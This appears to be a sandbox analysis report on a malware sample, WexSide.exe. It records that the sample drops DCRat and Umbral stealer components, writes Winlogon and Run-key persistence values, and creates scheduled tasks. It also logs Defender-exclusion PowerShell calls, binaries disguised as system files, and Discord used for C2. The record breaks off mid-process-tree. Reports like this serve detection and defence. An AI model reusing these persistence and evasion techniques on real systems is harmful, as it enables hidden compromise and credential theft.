Analysis
-
max time kernel
1200s -
max time network
1201s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
31-05-2024 12:01
Static task
static1
Behavioral task
behavioral1
Sample
WexSide.exe
Resource
win10v2004-20240508-en
General
-
Target
WexSide.exe
-
Size
2.2MB
-
MD5
185d2eb442c0f2c465ff5fc759621de6
-
SHA1
fceed286074f22e85287570ffa735d5874c8a139
-
SHA256
de88a6957905b06ffa24d512b148dd6fee45df029c676f1b0755fe0fa73ea871
-
SHA512
b9b25092fea71f573ca8c42beb376e53d0b9b68bc208990ba726b9c7c935ee243b78cd5fb84ce854445abba9d54b2e59c04ead03f1f5eec28286f2501e85bdeb
-
SSDEEP
49152:RFUvKLlr9rxyRciFlXKUusoNSAHWlCcHANKMY2Xj:RavGlrJxyRc2XKdSA2hnMY2Xj
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000023310-25.dat family_umbral behavioral1/memory/4588-33-0x0000018D76460000-0x0000018D764A0000-memory.dmp family_umbral -
Modifies WinLogon for persistence 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\dwm.exe\"" Updater.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\TextInputHost.exe\"" Updater.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\TextInputHost.exe\", \"C:\\Program Files\\Internet Explorer\\it-IT\\spoolsv.exe\"" Updater.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\TextInputHost.exe\", \"C:\\Program Files\\Internet Explorer\\it-IT\\spoolsv.exe\", \"C:\\Users\\Default\\Pictures\\fontdrvhost.exe\"" Updater.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\TextInputHost.exe\", \"C:\\Program Files\\Internet Explorer\\it-IT\\spoolsv.exe\", \"C:\\Users\\Default\\Pictures\\fontdrvhost.exe\", \"C:\\Program Files\\7-Zip\\Lang\\msedge.exe\"" Updater.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\TextInputHost.exe\", \"C:\\Program Files\\Internet Explorer\\it-IT\\spoolsv.exe\", \"C:\\Users\\Default\\Pictures\\fontdrvhost.exe\", \"C:\\Program Files\\7-Zip\\Lang\\msedge.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\Discord\\Updater.exe\"" Updater.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Notepad++ Upgrade.exe" SlasherTeam.exe -
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2432 1164 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1492 1164 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3044 1164 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3132 1164 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4328 1164 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3640 1164 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4032 1164 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1276 1164 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3200 1164 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1852 1164 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4984 1164 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1324 1164 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1332 1164 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5104 1164 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 216 1164 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 224 1164 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1372 1164 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3772 1164 schtasks.exe 94 -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3948 powershell.exe 3080 powershell.exe 4136 powershell.exe 1844 powershell.exe 4276 powershell.exe 3292 powershell.exe 448 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Minecraft 1.16.5.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation jpzkqk.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation WexSide.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation DCRatBuild.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation Updater.exe -
Executes dropped EXE 20 IoCs
pid Process 4860 DCRatBuild.exe 3204 SlasherTeam.exe 4588 Minecraft 1.16.5.exe 2548 Updater.exe 2136 msedge.exe 5680 TextInputHost.exe 228 jpzkqk.exe 5136 dwm.exe 380 SlasherTeam.exe 2204 msedge.exe 5068 fontdrvhost.exe 1088 msedge.exe 1888 Updater.exe 2316 dwm.exe 2212 TextInputHost.exe 3604 spoolsv.exe 5704 fontdrvhost.exe 4932 msedge.exe 2388 Updater.exe 2248 dwm.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 13 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TextInputHost = "\"C:\\Recovery\\WindowsRE\\TextInputHost.exe\"" Updater.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\Default\\Pictures\\fontdrvhost.exe\"" Updater.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\Default\\Pictures\\fontdrvhost.exe\"" Updater.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\WindowsRE\\dwm.exe\"" Updater.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Program Files\\7-Zip\\Lang\\msedge.exe\"" Updater.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Program Files\\7-Zip\\Lang\\msedge.exe\"" Updater.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater = "\"C:\\Users\\Admin\\AppData\\Roaming\\Discord\\Updater.exe\"" Updater.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files\\Internet Explorer\\it-IT\\spoolsv.exe\"" Updater.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater = "\"C:\\Users\\Admin\\AppData\\Roaming\\Discord\\Updater.exe\"" Updater.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files\\Internet Explorer\\it-IT\\spoolsv.exe\"" Updater.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TextInputHost = "\"C:\\Recovery\\WindowsRE\\TextInputHost.exe\"" Updater.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pisya = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Audacity Upgrade.exe" SlasherTeam.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\WindowsRE\\dwm.exe\"" Updater.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 36 discord.com 37 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 ip-api.com -
Drops file in System32 directory 2 IoCs
description ioc Process File created \??\c:\Windows\System32\CSC6CCDE66B4B8D4942B78F91C89C8EB53.TMP csc.exe File created \??\c:\Windows\System32\jpzkqk.exe csc.exe -
Drops file in Program Files directory 7 IoCs
description ioc Process File created C:\Program Files\Internet Explorer\it-IT\spoolsv.exe Updater.exe File created C:\Program Files\Internet Explorer\it-IT\f3b6ecef712a24 Updater.exe File created \??\c:\Program Files (x86)\Microsoft\Edge\Application\CSCA72995458D514213A337DC9C621D8484.TMP csc.exe File created \??\c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe csc.exe File created C:\Program Files\7-Zip\Lang\msedge.exe Updater.exe File opened for modification C:\Program Files\7-Zip\Lang\msedge.exe Updater.exe File created C:\Program Files\7-Zip\Lang\61a52ddc9dd915 Updater.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe -
Creates scheduled task(s) 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1332 schtasks.exe 224 schtasks.exe 3772 schtasks.exe 3132 schtasks.exe 4328 schtasks.exe 3640 schtasks.exe 1324 schtasks.exe 2432 schtasks.exe 1852 schtasks.exe 1276 schtasks.exe 3200 schtasks.exe 5104 schtasks.exe 216 schtasks.exe 1372 schtasks.exe 1492 schtasks.exe 3044 schtasks.exe 4032 schtasks.exe 4984 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4820 wmic.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133616308035016984" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings Updater.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings DCRatBuild.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 taskmgr.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 5360 PING.EXE 5312 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe 2548 Updater.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 5680 TextInputHost.exe 5940 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 5012 chrome.exe 5012 chrome.exe 5012 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3204 SlasherTeam.exe Token: SeDebugPrivilege 4588 Minecraft 1.16.5.exe Token: SeDebugPrivilege 2548 Updater.exe Token: SeDebugPrivilege 3948 powershell.exe Token: SeDebugPrivilege 2376 powershell.exe Token: SeDebugPrivilege 1316 powershell.exe Token: SeDebugPrivilege 3080 powershell.exe Token: SeDebugPrivilege 4276 powershell.exe Token: SeDebugPrivilege 4136 powershell.exe Token: SeDebugPrivilege 3292 powershell.exe Token: SeDebugPrivilege 1844 powershell.exe Token: SeDebugPrivilege 448 powershell.exe Token: SeDebugPrivilege 5392 powershell.exe Token: SeDebugPrivilege 5680 TextInputHost.exe Token: SeIncreaseQuotaPrivilege 5800 wmic.exe Token: SeSecurityPrivilege 5800 wmic.exe Token: SeTakeOwnershipPrivilege 5800 wmic.exe Token: SeLoadDriverPrivilege 5800 wmic.exe Token: SeSystemProfilePrivilege 5800 wmic.exe Token: SeSystemtimePrivilege 5800 wmic.exe Token: SeProfSingleProcessPrivilege 5800 wmic.exe Token: SeIncBasePriorityPrivilege 5800 wmic.exe Token: SeCreatePagefilePrivilege 5800 wmic.exe Token: SeBackupPrivilege 5800 wmic.exe Token: SeRestorePrivilege 5800 wmic.exe Token: SeShutdownPrivilege 5800 wmic.exe Token: SeDebugPrivilege 5800 wmic.exe Token: SeSystemEnvironmentPrivilege 5800 wmic.exe Token: SeRemoteShutdownPrivilege 5800 wmic.exe Token: SeUndockPrivilege 5800 wmic.exe Token: SeManageVolumePrivilege 5800 wmic.exe Token: 33 5800 wmic.exe Token: 34 5800 wmic.exe Token: 35 5800 wmic.exe Token: 36 5800 wmic.exe Token: SeIncreaseQuotaPrivilege 5800 wmic.exe Token: SeSecurityPrivilege 5800 wmic.exe Token: SeTakeOwnershipPrivilege 5800 wmic.exe Token: SeLoadDriverPrivilege 5800 wmic.exe Token: SeSystemProfilePrivilege 5800 wmic.exe Token: SeSystemtimePrivilege 5800 wmic.exe Token: SeProfSingleProcessPrivilege 5800 wmic.exe Token: SeIncBasePriorityPrivilege 5800 wmic.exe Token: SeCreatePagefilePrivilege 5800 wmic.exe Token: SeBackupPrivilege 5800 wmic.exe Token: SeRestorePrivilege 5800 wmic.exe Token: SeShutdownPrivilege 5800 wmic.exe Token: SeDebugPrivilege 5800 wmic.exe Token: SeSystemEnvironmentPrivilege 5800 wmic.exe Token: SeRemoteShutdownPrivilege 5800 wmic.exe Token: SeUndockPrivilege 5800 wmic.exe Token: SeManageVolumePrivilege 5800 wmic.exe Token: 33 5800 wmic.exe Token: 34 5800 wmic.exe Token: 35 5800 wmic.exe Token: 36 5800 wmic.exe Token: SeIncreaseQuotaPrivilege 5900 wmic.exe Token: SeSecurityPrivilege 5900 wmic.exe Token: SeTakeOwnershipPrivilege 5900 wmic.exe Token: SeLoadDriverPrivilege 5900 wmic.exe Token: SeSystemProfilePrivilege 5900 wmic.exe Token: SeSystemtimePrivilege 5900 wmic.exe Token: SeProfSingleProcessPrivilege 5900 wmic.exe Token: SeIncBasePriorityPrivilege 5900 wmic.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe 5940 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2280 wrote to memory of 4860 2280 WexSide.exe 91 PID 2280 wrote to memory of 4860 2280 WexSide.exe 91 PID 2280 wrote to memory of 4860 2280 WexSide.exe 91 PID 2280 wrote to memory of 3204 2280 WexSide.exe 92 PID 2280 wrote to memory of 3204 2280 WexSide.exe 92 PID 2280 wrote to memory of 4588 2280 WexSide.exe 93 PID 2280 wrote to memory of 4588 2280 WexSide.exe 93 PID 4860 wrote to memory of 4512 4860 DCRatBuild.exe 95 PID 4860 wrote to memory of 4512 4860 DCRatBuild.exe 95 PID 4860 wrote to memory of 4512 4860 DCRatBuild.exe 95 PID 4512 wrote to memory of 4820 4512 WScript.exe 98 PID 4512 wrote to memory of 4820 4512 WScript.exe 98 PID 4512 wrote to memory of 4820 4512 WScript.exe 98 PID 4820 wrote to memory of 2548 4820 cmd.exe 100 PID 4820 wrote to memory of 2548 4820 cmd.exe 100 PID 4588 wrote to memory of 3488 4588 Minecraft 1.16.5.exe 102 PID 4588 wrote to memory of 3488 4588 Minecraft 1.16.5.exe 102 PID 4588 wrote to memory of 3948 4588 Minecraft 1.16.5.exe 104 PID 4588 wrote to memory of 3948 4588 Minecraft 1.16.5.exe 104 PID 2548 wrote to memory of 1168 2548 Updater.exe 109 PID 2548 wrote to memory of 1168 2548 Updater.exe 109 PID 1168 wrote to memory of 984 1168 csc.exe 111 PID 1168 wrote to memory of 984 1168 csc.exe 111 PID 2548 wrote to memory of 1868 2548 Updater.exe 112 PID 2548 wrote to memory of 1868 2548 Updater.exe 112 PID 4588 wrote to memory of 2376 4588 Minecraft 1.16.5.exe 114 PID 4588 wrote to memory of 2376 4588 Minecraft 1.16.5.exe 114 PID 1868 wrote to memory of 4144 1868 csc.exe 116 PID 1868 wrote to memory of 4144 1868 csc.exe 116 PID 4588 wrote to memory of 1316 4588 Minecraft 1.16.5.exe 121 PID 4588 wrote to memory of 1316 4588 Minecraft 1.16.5.exe 121 PID 2548 wrote to memory of 448 2548 Updater.exe 134 PID 2548 wrote to memory of 448 2548 Updater.exe 134 PID 2548 wrote to memory of 3292 2548 Updater.exe 135 PID 2548 wrote to memory of 3292 2548 Updater.exe 135 PID 2548 wrote to memory of 4276 2548 Updater.exe 136 PID 2548 wrote to memory of 4276 2548 Updater.exe 136 PID 2548 wrote to memory of 3080 2548 Updater.exe 137 PID 2548 wrote to memory of 3080 2548 Updater.exe 137 PID 2548 wrote to memory of 1844 2548 Updater.exe 138 PID 2548 wrote to memory of 1844 2548 Updater.exe 138 PID 2548 wrote to memory of 4136 2548 Updater.exe 139 PID 2548 wrote to memory of 4136 2548 Updater.exe 139 PID 2548 wrote to memory of 4224 2548 Updater.exe 147 PID 2548 wrote to memory of 4224 2548 Updater.exe 147 PID 4224 wrote to memory of 5240 4224 cmd.exe 149 PID 4224 wrote to memory of 5240 4224 cmd.exe 149 PID 4224 wrote to memory of 5360 4224 cmd.exe 150 PID 4224 wrote to memory of 5360 4224 cmd.exe 150 PID 4588 wrote to memory of 5392 4588 Minecraft 1.16.5.exe 151 PID 4588 wrote to memory of 5392 4588 Minecraft 1.16.5.exe 151 PID 4224 wrote to memory of 5680 4224 cmd.exe 153 PID 4224 wrote to memory of 5680 4224 cmd.exe 153 PID 4588 wrote to memory of 5800 4588 Minecraft 1.16.5.exe 154 PID 4588 wrote to memory of 5800 4588 Minecraft 1.16.5.exe 154 PID 4588 wrote to memory of 5900 4588 Minecraft 1.16.5.exe 156 PID 4588 wrote to memory of 5900 4588 Minecraft 1.16.5.exe 156 PID 4588 wrote to memory of 5964 4588 Minecraft 1.16.5.exe 158 PID 4588 wrote to memory of 5964 4588 Minecraft 1.16.5.exe 158 PID 4588 wrote to memory of 6060 4588 Minecraft 1.16.5.exe 160 PID 4588 wrote to memory of 6060 4588 Minecraft 1.16.5.exe 160 PID 4588 wrote to memory of 4820 4588 Minecraft 1.16.5.exe 162 PID 4588 wrote to memory of 4820 4588 Minecraft 1.16.5.exe 162 PID 4588 wrote to memory of 3984 4588 Minecraft 1.16.5.exe 167 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3488 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\WexSide.exe"C:\Users\Admin\AppData\Local\Temp\WexSide.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Discord\T1NFhHkgq1TxEudZp4T5tcPMCxBHzViymHwuXZcM1.vbe"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Discord\UBpnz6SmdVDq0k17g6u44x.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4820 -
C:\Users\Admin\AppData\Roaming\Discord\Updater.exe"C:\Users\Admin\AppData\Roaming\Discord/Updater.exe"5⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2548 -
